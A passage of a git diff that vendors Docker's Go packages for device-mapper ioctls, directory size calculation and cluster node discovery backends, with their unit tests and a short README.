0 { + return 0, err + } + return size, nil +} + +func ioctlBlkDiscard(fd uintptr, offset, length uint64) error { + var r [2]uint64 + r[0] = offset + r[1] = length + + if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, BlkDiscard, uintptr(unsafe.Pointer(&r[0]))); err != 0 { + return err + } + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/log.go b/vendor/github.com/docker/docker/pkg/devicemapper/log.go new file mode 100644 index 0000000000..cee5e54549 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/devicemapper/log.go @@ -0,0 +1,11 @@ +package devicemapper + +// definitions from lvm2 lib/log/log.h +const ( + LogLevelFatal = 2 + iota // _LOG_FATAL + LogLevelErr // _LOG_ERR + LogLevelWarn // _LOG_WARN + LogLevelNotice // _LOG_NOTICE + LogLevelInfo // _LOG_INFO + LogLevelDebug // _LOG_DEBUG +) diff --git a/vendor/github.com/docker/docker/pkg/directory/directory.go b/vendor/github.com/docker/docker/pkg/directory/directory.go new file mode 100644 index 0000000000..1715ef45d9 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/directory/directory.go @@ -0,0 +1,26 @@ +package directory + +import ( + "io/ioutil" + "os" + "path/filepath" +) + +// MoveToSubdir moves all contents of a directory to a subdirectory underneath the original path +func MoveToSubdir(oldpath, subdir string) error { + + infos, err := ioutil.ReadDir(oldpath) + if err != nil { + return err + } + for _, info := range infos { + if info.Name() != subdir { + oldName := filepath.Join(oldpath, info.Name()) + newName := filepath.Join(oldpath, subdir, info.Name()) + if err := os.Rename(oldName, newName); err != nil { + return err + } + } + } + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/directory/directory_test.go b/vendor/github.com/docker/docker/pkg/directory/directory_test.go new file mode 100644 index 0000000000..2b7a4657be --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/directory/directory_test.go @@ -0,0 +1,192 @@ +package directory + +import ( + "io/ioutil" + "os" + "path/filepath" + "reflect" + "sort" + "testing" +) + +// Size of an empty directory should be 0 +func TestSizeEmpty(t *testing.T) { + var dir string + var err error + if dir, err = ioutil.TempDir(os.TempDir(), "testSizeEmptyDirectory"); err != nil { + t.Fatalf("failed to create directory: %s", err) + } + + var size int64 + if size, _ = Size(dir); size != 0 { + t.Fatalf("empty directory has size: %d", size) + } +} + +// Size of a directory with one empty file should be 0 +func TestSizeEmptyFile(t *testing.T) { + var dir string + var err error + if dir, err = ioutil.TempDir(os.TempDir(), "testSizeEmptyFile"); err != nil { + t.Fatalf("failed to create directory: %s", err) + } + + var file *os.File + if file, err = ioutil.TempFile(dir, "file"); err != nil { + t.Fatalf("failed to create file: %s", err) + } + + var size int64 + if size, _ = Size(file.Name()); size != 0 { + t.Fatalf("directory with one file has size: %d", size) + } +} + +// Size of a directory with one 5-byte file should be 5 +func TestSizeNonemptyFile(t *testing.T) { + var dir string + var err error + if dir, err = ioutil.TempDir(os.TempDir(), "testSizeNonemptyFile"); err != nil { + t.Fatalf("failed to create directory: %s", err) + } + + var file *os.File + if file, err = ioutil.TempFile(dir, "file"); err != nil { + t.Fatalf("failed to create file: %s", err) + } + + d := []byte{97, 98, 99, 100, 101} + file.Write(d) + + var size int64 + if size, _ = Size(file.Name()); size != 5 { + t.Fatalf("directory with one 5-byte file has size: %d", size) + } +} + +// Size of a directory with one empty directory should be 0 +func TestSizeNestedDirectoryEmpty(t *testing.T) { + var dir string + var err error + if dir, err = ioutil.TempDir(os.TempDir(), "testSizeNestedDirectoryEmpty"); err != nil { + t.Fatalf("failed to create directory: %s", err) + } + if dir, err = ioutil.TempDir(dir, "nested"); err != nil { + t.Fatalf("failed to create nested directory: %s", err) + } + + var size int64 + if size, _ = Size(dir); size != 0 { + t.Fatalf("directory with one empty directory has size: %d", size) + } +} + +// Test directory with 1 file and 1 empty directory +func TestSizeFileAndNestedDirectoryEmpty(t *testing.T) { + var dir string + var err error + if dir, err = ioutil.TempDir(os.TempDir(), "testSizeFileAndNestedDirectoryEmpty"); err != nil { + t.Fatalf("failed to create directory: %s", err) + } + if dir, err = ioutil.TempDir(dir, "nested"); err != nil { + t.Fatalf("failed to create nested directory: %s", err) + } + + var file *os.File + if file, err = ioutil.TempFile(dir, "file"); err != nil { + t.Fatalf("failed to create file: %s", err) + } + + d := []byte{100, 111, 99, 107, 101, 114} + file.Write(d) + + var size int64 + if size, _ = Size(dir); size != 6 { + t.Fatalf("directory with 6-byte file and empty directory has size: %d", size) + } +} + +// Test directory with 1 file and 1 non-empty directory +func TestSizeFileAndNestedDirectoryNonempty(t *testing.T) { + var dir, dirNested string + var err error + if dir, err = ioutil.TempDir(os.TempDir(), "TestSizeFileAndNestedDirectoryNonempty"); err != nil { + t.Fatalf("failed to create directory: %s", err) + } + if dirNested, err = ioutil.TempDir(dir, "nested"); err != nil { + t.Fatalf("failed to create nested directory: %s", err) + } + + var file *os.File + if file, err = ioutil.TempFile(dir, "file"); err != nil { + t.Fatalf("failed to create file: %s", err) + } + + data := []byte{100, 111, 99, 107, 101, 114} + file.Write(data) + + var nestedFile *os.File + if nestedFile, err = ioutil.TempFile(dirNested, "file"); err != nil { + t.Fatalf("failed to create file in nested directory: %s", err) + } + + nestedData := []byte{100, 111, 99, 107, 101, 114} + nestedFile.Write(nestedData) + + var size int64 + if size, _ = Size(dir); size != 12 { + t.Fatalf("directory with 6-byte file and nested directory with 6-byte file has size: %d", size) + } +} + +// Test migration of directory to a subdir underneath itself +func TestMoveToSubdir(t *testing.T) { + var outerDir, subDir string + var err error + + if outerDir, err = ioutil.TempDir(os.TempDir(), "TestMoveToSubdir"); err != nil { + t.Fatalf("failed to create directory: %v", err) + } + + if subDir, err = ioutil.TempDir(outerDir, "testSub"); err != nil { + t.Fatalf("failed to create subdirectory: %v", err) + } + + // write 4 temp files in the outer dir to get moved + filesList := []string{"a", "b", "c", "d"} + for _, fName := range filesList { + if file, err := os.Create(filepath.Join(outerDir, fName)); err != nil { + t.Fatalf("couldn't create temp file %q: %v", fName, err) + } else { + file.WriteString(fName) + file.Close() + } + } + + if err = MoveToSubdir(outerDir, filepath.Base(subDir)); err != nil { + t.Fatalf("Error during migration of content to subdirectory: %v", err) + } + // validate that the files were moved to the subdirectory + infos, err := ioutil.ReadDir(subDir) + if err != nil { + t.Fatal(err) + } + if len(infos) != 4 { + t.Fatalf("Should be four files in the subdir after the migration: actual length: %d", len(infos)) + } + var results []string + for _, info := range infos { + results = append(results, info.Name()) + } + sort.Sort(sort.StringSlice(results)) + if !reflect.DeepEqual(filesList, results) { + t.Fatalf("Results after migration do not equal list of files: expected: %v, got: %v", filesList, results) + } +} + +// Test a non-existing directory +func TestSizeNonExistingDirectory(t *testing.T) { + if _, err := Size("/thisdirectoryshouldnotexist/TestSizeNonExistingDirectory"); err == nil { + t.Fatalf("error is expected") + } +} diff --git a/vendor/github.com/docker/docker/pkg/directory/directory_unix.go b/vendor/github.com/docker/docker/pkg/directory/directory_unix.go new file mode 100644 index 0000000000..397251bdb8 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/directory/directory_unix.go @@ -0,0 +1,48 @@ +// +build linux freebsd solaris + +package directory + +import ( + "os" + "path/filepath" + "syscall" +) + +// Size walks a directory tree and returns its total size in bytes. +func Size(dir string) (size int64, err error) { + data := make(map[uint64]struct{}) + err = filepath.Walk(dir, func(d string, fileInfo os.FileInfo, err error) error { + if err != nil { + // if dir does not exist, Size() returns the error. + // if dir/x disappeared while walking, Size() ignores dir/x. + if os.IsNotExist(err) && d != dir { + return nil + } + return err + } + + // Ignore directory sizes + if fileInfo == nil { + return nil + } + + s := fileInfo.Size() + if fileInfo.IsDir() || s == 0 { + return nil + } + + // Check inode to handle hard links correctly + inode := fileInfo.Sys().(*syscall.Stat_t).Ino + // inode is not a uint64 on all platforms. Cast it to avoid issues. + if _, exists := data[uint64(inode)]; exists { + return nil + } + // inode is not a uint64 on all platforms. Cast it to avoid issues. + data[uint64(inode)] = struct{}{} + + size += s + + return nil + }) + return +} diff --git a/vendor/github.com/docker/docker/pkg/directory/directory_windows.go b/vendor/github.com/docker/docker/pkg/directory/directory_windows.go new file mode 100644 index 0000000000..6fb0917c4c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/directory/directory_windows.go @@ -0,0 +1,37 @@ +// +build windows + +package directory + +import ( + "os" + "path/filepath" +) + +// Size walks a directory tree and returns its total size in bytes. +func Size(dir string) (size int64, err error) { + err = filepath.Walk(dir, func(d string, fileInfo os.FileInfo, err error) error { + if err != nil { + // if dir does not exist, Size() returns the error. + // if dir/x disappeared while walking, Size() ignores dir/x. + if os.IsNotExist(err) && d != dir { + return nil + } + return err + } + + // Ignore directory sizes + if fileInfo == nil { + return nil + } + + s := fileInfo.Size() + if fileInfo.IsDir() || s == 0 { + return nil + } + + size += s + + return nil + }) + return +} diff --git a/vendor/github.com/docker/docker/pkg/discovery/README.md b/vendor/github.com/docker/docker/pkg/discovery/README.md new file mode 100644 index 0000000000..39777c2171 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/discovery/README.md @@ -0,0 +1,41 @@ +--- +page_title: Docker discovery +page_description: discovery +page_keywords: docker, clustering, discovery +--- + +# Discovery + +Docker comes with multiple Discovery backends. + +## Backends + +### Using etcd + +Point your Docker Engine instances to a common etcd instance. You can specify +the address Docker uses to advertise the node using the `--cluster-advertise` +flag. + +```bash +$ docker daemon -H= --cluster-advertise= --cluster-store etcd://,/ +``` + +### Using consul + +Point your Docker Engine instances to a common Consul instance. You can specify +the address Docker uses to advertise the node using the `--cluster-advertise` +flag. + +```bash +$ docker daemon -H= --cluster-advertise= --cluster-store consul:/// +``` + +### Using zookeeper + +Point your Docker Engine instances to a common Zookeeper instance. You can specify +the address Docker uses to advertise the node using the `--cluster-advertise` +flag. + +```bash +$ docker daemon -H= --cluster-advertise= --cluster-store zk://,/ +``` diff --git a/vendor/github.com/docker/docker/pkg/discovery/backends.go b/vendor/github.com/docker/docker/pkg/discovery/backends.go new file mode 100644 index 0000000000..2eab550e29 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/discovery/backends.go @@ -0,0 +1,107 @@ +package discovery + +import ( + "fmt" + "net" + "strings" + "time" + + "github.com/Sirupsen/logrus" +) + +var ( + // Backends is a global map of discovery backends indexed by their + // associated scheme. + backends = make(map[string]Backend) +) + +// Register makes a discovery backend available by the provided scheme. +// If Register is called twice with the same scheme an error is returned. +func Register(scheme string, d Backend) error { + if _, exists := backends[scheme]; exists { + return fmt.Errorf("scheme already registered %s", scheme) + } + logrus.WithField("name", scheme).Debugf("Registering discovery service") + backends[scheme] = d + return nil +} + +func parse(rawurl string) (string, string) { + parts := strings.SplitN(rawurl, "://", 2) + + // nodes:port,node2:port => nodes://node1:port,node2:port + if len(parts) == 1 { + return "nodes", parts[0] + } + return parts[0], parts[1] +} + +// ParseAdvertise parses the --cluster-advertise daemon config which accepts +// : or : +func ParseAdvertise(advertise string) (string, error) { + var ( + iface *net.Interface + addrs []net.Addr + err error + ) + + addr, port, err := net.SplitHostPort(advertise) + + if err != nil { + return "", fmt.Errorf("invalid --cluster-advertise configuration: %s: %v", advertise, err) + } + + ip := net.ParseIP(addr) + // If it is a valid ip-address, use it as is + if ip != nil { + return advertise, nil + } + + // If advertise is a valid interface name, get the valid IPv4 address and use it to advertise + ifaceName := addr + iface, err = net.InterfaceByName(ifaceName) + if err != nil { + return "", fmt.Errorf("invalid cluster advertise IP address or interface name (%s) : %v", advertise, err) + } + + addrs, err = iface.Addrs() + if err != nil { + return "", fmt.Errorf("unable to get advertise IP address from interface (%s) : %v", advertise, err) + } + + if len(addrs) == 0 { + return "", fmt.Errorf("no available advertise IP address in interface (%s)", advertise) + } + + addr = "" + for _, a := range addrs { + ip, _, err := net.ParseCIDR(a.String()) + if err != nil { + return "", fmt.Errorf("error deriving advertise ip-address in interface (%s) : %v", advertise, err) + } + if ip.To4() == nil || ip.IsLoopback() { + continue + } + addr = ip.String() + break + } + if addr == "" { + return "", fmt.Errorf("could not find a valid ip-address in interface %s", advertise) + } + + addr = net.JoinHostPort(addr, port) + return addr, nil +} + +// New returns a new Discovery given a URL, heartbeat and ttl settings. +// Returns an error if the URL scheme is not supported. +func New(rawurl string, heartbeat time.Duration, ttl time.Duration, clusterOpts map[string]string) (Backend, error) { + scheme, uri := parse(rawurl) + if backend, exists := backends[scheme]; exists { + logrus.WithFields(logrus.Fields{"name": scheme, "uri": uri}).Debugf("Initializing discovery service") + err := backend.Initialize(uri, heartbeat, ttl, clusterOpts) + return backend, err + } + + return nil, ErrNotSupported +} diff --git a/vendor/github.com/docker/docker/pkg/discovery/discovery.go b/vendor/github.com/docker/docker/pkg/discovery/discovery.go new file mode 100644 index 0000000000..ca7f587458 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/discovery/discovery.go @@ -0,0 +1,35 @@ +package discovery + +import ( + "errors" + "time" +) + +var ( + // ErrNotSupported is returned when a discovery service is not supported. + ErrNotSupported = errors.New("discovery service not supported") + + // ErrNotImplemented is returned when discovery feature is not implemented + // by discovery backend. + ErrNotImplemented = errors.New("not implemented in this discovery service") +) + +// Watcher provides watching over a cluster for nodes joining and leaving. +type Watcher interface { + // Watch the discovery for entry changes. + // Returns a channel that will receive changes or an error. + // Providing a non-nil stopCh can be used to stop watching. + Watch(stopCh <-chan struct{}) (<-chan Entries, <-chan error) +} + +// Backend is implemented by discovery backends which manage cluster entries. +type Backend interface { + // Watcher must be provided by every backend. + Watcher + + // Initialize the discovery with URIs, a heartbeat, a ttl and optional settings. + Initialize(string, time.Duration, time.Duration, map[string]string) error + + // Register to the discovery. + Register(string) error +} diff --git a/vendor/github.com/docker/docker/pkg/discovery/discovery_test.go b/vendor/github.com/docker/docker/pkg/discovery/discovery_test.go new file mode 100644 index 0000000000..6084f3ef0d --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/discovery/discovery_test.go @@ -0,0 +1,137 @@ +package discovery + +import ( + "testing" + + "github.com/go-check/check" +) + +// Hook up gocheck into the "go test" runner. +func Test(t *testing.T) { check.TestingT(t) } + +type DiscoverySuite struct{} + +var _ = check.Suite(&DiscoverySuite{}) + +func (s *DiscoverySuite) TestNewEntry(c *check.C) { + entry, err := NewEntry("127.0.0.1:2375") + c.Assert(err, check.IsNil) + c.Assert(entry.Equals(&Entry{Host: "127.0.0.1", Port: "2375"}), check.Equals, true) + c.Assert(entry.String(), check.Equals, "127.0.0.1:2375") + + entry, err = NewEntry("[2001:db8:0:f101::2]:2375") + c.Assert(err, check.IsNil) + c.Assert(entry.Equals(&Entry{Host: "2001:db8:0:f101::2", Port: "2375"}), check.Equals, true) + c.Assert(entry.String(), check.Equals, "[2001:db8:0:f101::2]:2375") + + _, err = NewEntry("127.0.0.1") + c.Assert(err, check.NotNil) +} + +func (s *DiscoverySuite) TestParse(c *check.C) { + scheme, uri := parse("127.0.0.1:2375") + c.Assert(scheme, check.Equals, "nodes") + c.Assert(uri, check.Equals, "127.0.0.1:2375") + + scheme, uri = parse("localhost:2375") + c.Assert(scheme, check.Equals, "nodes") + c.Assert(uri, check.Equals, "localhost:2375") + + scheme, uri = parse("scheme://127.0.0.1:2375") + c.Assert(scheme, check.Equals, "scheme") + c.Assert(uri, check.Equals, "127.0.0.1:2375") + + scheme, uri = parse("scheme://localhost:2375") + c.Assert(scheme, check.Equals, "scheme") + c.Assert(uri, check.Equals, "localhost:2375") + + scheme, uri = parse("") + c.Assert(scheme, check.Equals, "nodes") + c.Assert(uri, check.Equals, "") +} + +func (s *DiscoverySuite) TestCreateEntries(c *check.C) { + entries, err := CreateEntries(nil) + c.Assert(entries, check.DeepEquals, Entries{}) + c.Assert(err, check.IsNil) + + entries, err = CreateEntries([]string{"127.0.0.1:2375", "127.0.0.2:2375", "[2001:db8:0:f101::2]:2375", ""}) + c.Assert(err, check.IsNil) + expected := Entries{ + &Entry{Host: "127.0.0.1", Port: "2375"}, + &Entry{Host: "127.0.0.2", Port: "2375"}, + &Entry{Host: "2001:db8:0:f101::2", Port: "2375"}, + } + c.Assert(entries.Equals(expected), check.Equals, true) + + _, err = CreateEntries([]string{"127.0.0.1", "127.0.0.2"}) + c.Assert(err, check.NotNil) +} + +func (s *DiscoverySuite) TestContainsEntry(c *check.C) { + entries, err := CreateEntries([]string{"127.0.0.1:2375", "127.0.0.2:2375", ""}) + c.Assert(err, check.IsNil) + c.Assert(entries.Contains(&Entry{Host: "127.0.0.1", Port: "2375"}), check.Equals, true) + c.Assert(entries.Contains(&Entry{Host: "127.0.0.3", Port: "2375"}), check.Equals, false) +} + +func (s *DiscoverySuite) TestEntriesEquality(c *check.C) { + entries := Entries{ + &Entry{Host: "127.0.0.1", Port: "2375"}, + &Entry{Host: "127.0.0.2", Port: "2375"}, + } + + // Same + c.Assert(entries.Equals(Entries{ + &Entry{Host: "127.0.0.1", Port: "2375"}, + &Entry{Host: "127.0.0.2", Port: "2375"}, + }), check. + Equals, true) + + // Different size + c.Assert(entries.Equals(Entries{ + &Entry{Host: "127.0.0.1", Port: "2375"}, + &Entry{Host: "127.0.0.2", Port: "2375"}, + &Entry{Host: "127.0.0.3", Port: "2375"}, + }), check. + Equals, false) + + // Different content + c.Assert(entries.Equals(Entries{ + &Entry{Host: "127.0.0.1", Port: "2375"}, + &Entry{Host: "127.0.0.42", Port: "2375"}, + }), check. + Equals, false) + +} + +func (s *DiscoverySuite) TestEntriesDiff(c *check.C) { + entry1 := &Entry{Host: "1.1.1.1", Port: "1111"} + entry2 := &Entry{Host: "2.2.2.2", Port: "2222"} + entry3 := &Entry{Host: "3.3.3.3", Port: "3333"} + entries := Entries{entry1, entry2} + + // No diff + added, removed := entries.Diff(Entries{entry2, entry1}) + c.Assert(added, check.HasLen, 0) + c.Assert(removed, check.HasLen, 0) + + // Add + added, removed = entries.Diff(Entries{entry2, entry3, entry1}) + c.Assert(added, check.HasLen, 1) + c.Assert(added.Contains(entry3), check.Equals, true) + c.Assert(removed, check.HasLen, 0) + + // Remove + added, removed = entries.Diff(Entries{entry2}) + c.Assert(added, check.HasLen, 0) + c.Assert(removed, check.HasLen, 1) + c.Assert(removed.Contains(entry1), check.Equals, true) + + // Add and remove + added, removed = entries.Diff(Entries{entry1, entry3}) + c.Assert(added, check.HasLen, 1) + c.Assert(added.Contains(entry3), check.Equals, true) + c.Assert(removed, check.HasLen, 1) + c.Assert(removed.Contains(entry2), check.Equals, true) +} diff --git a/vendor/github.com/docker/docker/pkg/discovery/entry.go b/vendor/github.com/docker/docker/pkg/discovery/entry.go new file mode 100644 index 0000000000..ce23bbf89b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/discovery/entry.go @@ -0,0 +1,94 @@ +package discovery + +import "net" + +// NewEntry creates a new entry. +func NewEntry(url string) (*Entry, error) { + host, port, err := net.SplitHostPort(url) + if err != nil { + return nil, err + } + return &Entry{host, port}, nil +} + +// An Entry represents a host. +type Entry struct { + Host string + Port string +} + +// Equals returns true if cmp contains the same data. +func (e *Entry) Equals(cmp *Entry) bool { + return e.Host == cmp.Host && e.Port == cmp.Port +} + +// String returns the string form of an entry. +func (e *Entry) String() string { + return net.JoinHostPort(e.Host, e.Port) +} + +// Entries is a list of *Entry with some helpers. +type Entries []*Entry + +// Equals returns true if cmp contains the same data. +func (e Entries) Equals(cmp Entries) bool { + // Check if the file has really changed. + if len(e) != len(cmp) { + return false + } + for i := range e { + if !e[i].Equals(cmp[i]) { + return false + } + } + return true +} + +// Contains returns true if the Entries contain a given Entry. +func (e Entries) Contains(entry *Entry) bool { + for _, curr := range e { + if curr.Equals(entry) { + return true + } + } + return false +} + +// Diff compares two entries and returns the added and removed entries. +func (e Entries) Diff(cmp Entries) (Entries, Entries) { + added := Entries{} + for _, entry := range cmp { + if !e.Contains(entry) { + added = append(added, entry) + } + } + + removed := Entries{} + for _, entry := range e { + if !cmp.Contains(entry) { + removed = append(removed, entry) + } + } + + return added, removed +} + +// CreateEntries returns an array of entries based on the given addresses. +func CreateEntries(addrs []string) (Entries, error) { + entries := Entries{} + if addrs == nil { + return entries, nil + } + + for _, addr := range addrs { + if len(addr) == 0 { + continue + } + entry, err := NewEntry(addr) + if err != nil { + return nil, err + } + entries = append(entries, entry) + } + return entries, nil +} diff --git a/vendor/github.com/docker/docker/pkg/discovery/file/file.go b/vendor/github.com/docker/docker/pkg/discovery/file/file.go new file mode 100644 index 0000000000..2b8e27b754 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/discovery/file/file.go @@ -0,0 +1,107 @@ +package file + +import ( + "fmt" + "io/ioutil" + "strings" + "time" + + "github.com/docker/docker/pkg/discovery" +) + +// Discovery is exported +type Discovery struct { + heartbeat time.Duration + path string +} + +func init() { + Init() +} + +// Init is exported +func Init() { + discovery.Register("file", &Discovery{}) +} + +// Initialize is exported +func (s *Discovery) Initialize(path string, heartbeat time.Duration, ttl time.Duration, _ map[string]string) error { + s.path = path + s.heartbeat = heartbeat + return nil +} + +func parseFileContent(content []byte) []string { + var result []string + for _, line := range strings.Split(strings.TrimSpace(string(content)), "\n") { + line = strings.TrimSpace(line) + // Ignoring line starts with # + if strings.HasPrefix(line, "#") { + continue + } + // Inlined # comment also ignored. + if strings.Contains(line, "#") { + line = line[0:strings.Index(line, "#")] + // Trim additional spaces caused by above stripping. + line = strings.TrimSpace(line) + } + result = append(result, discovery.Generate(line)...) + } + return result +} + +func (s *Discovery) fetch() (discovery.Entries, error) { + fileContent, err := ioutil.ReadFile(s.path) + if err != nil { + return nil, fmt.Errorf("failed to read '%s': %v", s.path, err) + } + return discovery.CreateEntries(parseFileContent(fileContent)) +} + +// Watch is exported +func (s *Discovery) Watch(stopCh <-chan struct{}) (<-chan discovery.Entries, <-chan error) { + ch := make(chan discovery.Entries) + errCh := make(chan error) + ticker := time.NewTicker(s.heartbeat) + + go func() { + defer close(errCh) + defer close(ch) + + // Send the initial entries if available. + currentEntries, err := s.fetch() + if err != nil { + errCh <- err + } else { + ch <- currentEntries + } + + // Periodically send updates. + for { + select { + case <-ticker.C: + newEntries, err := s.fetch() + if err != nil { + errCh <- err + continue + } + + // Check if the file has really changed. + if !newEntries.Equals(currentEntries) { + ch <- newEntries + } + currentEntries = newEntries + case <-stopCh: + ticker.Stop() + return + } + } + }() + + return ch, errCh +} + +// Register is exported +func (s *Discovery) Register(addr string) error { + return discovery.ErrNotImplemented +} diff --git a/vendor/github.com/docker/docker/pkg/discovery/file/file_test.go b/vendor/github.com/docker/docker/pkg/discovery/file/file_test.go new file mode 100644 index 0000000000..667f00ba0d --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/discovery/file/file_test.go @@ -0,0 +1,114 @@ +package file + +import ( + "io/ioutil" + "os" + "testing" + + "github.com/docker/docker/pkg/discovery" + + "github.com/go-check/check" +) + +// Hook up gocheck into the "go test" runner. +func Test(t *testing.T) { check.TestingT(t) } + +type DiscoverySuite struct{} + +var _ = check.Suite(&DiscoverySuite{}) + +func (s *DiscoverySuite) TestInitialize(c *check.C) { + d := &Discovery{} + d.Initialize("/path/to/file", 1000, 0, nil) + c.Assert(d.path, check.Equals, "/path/to/file") +} + +func (s *DiscoverySuite) TestNew(c *check.C) { + d, err := discovery.New("file:///path/to/file", 0, 0, nil) + c.Assert(err, check.IsNil) + c.Assert(d.(*Discovery).path, check.Equals, "/path/to/file") +} + +func (s *DiscoverySuite) TestContent(c *check.C) { + data := ` +1.1.1.[1:2]:1111 +2.2.2.[2:4]:2222 +` + ips := parseFileContent([]byte(data)) + c.Assert(ips, check.HasLen, 5) + c.Assert(ips[0], check.Equals, "1.1.1.1:1111") + c.Assert(ips[1], check.Equals, "1.1.1.2:1111") + c.Assert(ips[2], check.Equals, "2.2.2.2:2222") + c.Assert(ips[3], check.Equals, "2.2.2.3:2222") + c.Assert(ips[4], check.Equals, "2.2.2.4:2222") +} + +func (s *DiscoverySuite) TestRegister(c *check.C) { + discovery := &Discovery{path: "/path/to/file"} + c.Assert(discovery.Register("0.0.0.0"), check.NotNil) +} + +func (s *DiscoverySuite) TestParsingContentsWithComments(c *check.C) { + data := ` +### test ### +1.1.1.1:1111 # inline comment +# 2.2.2.2:2222 + ### empty line with comment + 3.3.3.3:3333 +### test ### +` + ips := parseFileContent([]byte(data)) + c.Assert(ips, check.HasLen, 2) + c.Assert("1.1.1.1:1111", check.Equals, ips[0]) + c.Assert("3.3.3.3:3333", check.Equals, ips[1]) +} + +func (s *DiscoverySuite) TestWatch(c *check.C) { + data := ` +1.1.1.1:1111 +2.2.2.2:2222 +` + expected := discovery.Entries{ + &discovery.Entry{Host: "1.1.1.1", Port: "1111"}, + &discovery.Entry{Host: "2.2.2.2", Port: "2222"}, + } + + // Create a temporary file and remove it. + tmp, err := ioutil.TempFile(os.TempDir(), "discovery-file-test") + c.Assert(err, check.IsNil) + c.Assert(tmp.Close(), check.IsNil) + c.Assert(os.Remove(tmp.Name()), check.IsNil) + + // Set up file discovery. + d := &Discovery{} + d.Initialize(tmp.Name(), 1000, 0, nil) + stopCh := make(chan struct{}) + ch, errCh := d.Watch(stopCh) + + // Make sure it fires errors since the file doesn't exist. + c.Assert(<-errCh, check.NotNil) + // We have to drain the error channel otherwise Watch will get stuck. + go func() { + for range errCh { + } + }() + + // Write the file and make sure we get the expected value back. + c.Assert(ioutil.WriteFile(tmp.Name(), []byte(data), 0600), check.IsNil) + c.Assert(<-ch, check.DeepEquals, expected) + + // Add a new entry and look it up. + expected = append(expected, &discovery.Entry{Host: "3.3.3.3", Port: "3333"}) + f, err := os.OpenFile(tmp.Name(), os.O_APPEND|os.O_WRONLY, 0600) + c.Assert(err, check.IsNil) + c.Assert(f, check.NotNil) + _, err = f.WriteString("\n3.3.3.3:3333\n") + c.Assert(err, check.IsNil) + f.Close() + c.Assert(<-ch, check.DeepEquals, expected) + + // Stop and make sure it closes all channels. + close(stopCh) + c.Assert(<-ch, check.IsNil) + c.Assert(<-errCh, check.IsNil) +} diff --git a/vendor/github.com/docker/docker/pkg/discovery/generator.go b/vendor/github.com/docker/docker/pkg/discovery/generator.go new file mode 100644 index 0000000000..d22298298f --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/discovery/generator.go @@ -0,0 +1,35 @@ +package discovery + +import ( + "fmt" + "regexp" + "strconv" +) + +// Generate takes care of IP generation +func Generate(pattern string) []string { + re, _ := regexp.Compile(`\[(.+):(.+)\]`) + submatch := re.FindStringSubmatch(pattern) + if submatch == nil { + return []string{pattern} + } + + from, err := strconv.Atoi(submatch[1]) + if err != nil { + return []string{pattern} + } + to, err := strconv.Atoi(submatch[2]) + if err != nil { + return []string{pattern} + } + + template := re.ReplaceAllString(pattern, "%d") + + var result []string + for val := from; val <= to; val++ { + entry := fmt.Sprintf(template, val) + result = append(result, entry) + } + + return result +} diff --git a/vendor/github.com/docker/docker/pkg/discovery/generator_test.go b/vendor/github.com/docker/docker/pkg/discovery/generator_test.go new file mode 100644 index 0000000000..6281c46665 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/discovery/generator_test.go @@ -0,0 +1,53 @@ +package discovery + +import ( + "github.com/go-check/check" +) + +func (s *DiscoverySuite) TestGeneratorNotGenerate(c *check.C) { + ips := Generate("127.0.0.1") + c.Assert(len(ips), check.Equals, 1) + c.Assert(ips[0], check.Equals, "127.0.0.1") +} + +func (s *DiscoverySuite) TestGeneratorWithPortNotGenerate(c *check.C) { + ips := Generate("127.0.0.1:8080") + c.Assert(len(ips), check.Equals, 1) + c.Assert(ips[0], check.Equals, "127.0.0.1:8080") +} + +func (s *DiscoverySuite) TestGeneratorMatchFailedNotGenerate(c *check.C) { + ips := Generate("127.0.0.[1]") + c.Assert(len(ips), check.Equals, 1) + c.Assert(ips[0], check.Equals, "127.0.0.[1]") +} + +func (s *DiscoverySuite) TestGeneratorWithPort(c *check.C) { + ips := Generate("127.0.0.[1:11]:2375") + c.Assert(len(ips), check.Equals, 11) + c.Assert(ips[0], check.Equals, "127.0.0.1:2375") + c.Assert(ips[1], check.Equals, "127.0.0.2:2375") + c.Assert(ips[2], check.Equals, "127.0.0.3:2375") + c.Assert(ips[3], check.Equals, "127.0.0.4:2375") + c.Assert(ips[4], check.Equals, "127.0.0.5:2375") + c.Assert(ips[5], check.Equals, "127.0.0.6:2375") + c.Assert(ips[6], check.Equals, "127.0.0.7:2375") + c.Assert(ips[7], check.Equals, "127.0.0.8:2375") + c.Assert(ips[8], check.Equals, "127.0.0.9:2375") + c.Assert(ips[9], check.Equals, "127.0.0.10:2375") + c.Assert(ips[10], check.Equals, "127.0.0.11:2375") +} + +func (s *DiscoverySuite) TestGenerateWithMalformedInputAtRangeStart(c *check.C) { + malformedInput := "127.0.0.[x:11]:2375" + ips := Generate(malformedInput) + c.Assert(len(ips), check.Equals, 1) + c.Assert(ips[0], check.Equals, malformedInput) +} + +func (s *DiscoverySuite) TestGenerateWithMalformedInputAtRangeEnd(c *check.C) { + malformedInput := "127.0.0.[1:x]:2375" + ips := Generate(malformedInput) + c.Assert(len(ips), check.Equals, 1) + c.Assert(ips[0], check.Equals, malformedInput) +} diff --git a/vendor/github.com/docker/docker/pkg/discovery/kv/kv.go b/vendor/github.com/docker/docker/pkg/discovery/kv/kv.go new file mode 100644 index 0000000000..77eee7d454 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/discovery/kv/kv.go @@ -0,0 +1,192 @@ +package kv + +import ( + "fmt" + "path" + "strings" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/discovery" + "github.com/docker/go-connections/tlsconfig" + "github.com/docker/libkv" + "github.com/docker/libkv/store" + "github.com/docker/libkv/store/consul" + "github.com/docker/libkv/store/etcd" + "github.com/docker/libkv/store/zookeeper" +) + +const ( + defaultDiscoveryPath = "docker/nodes" +) + +// 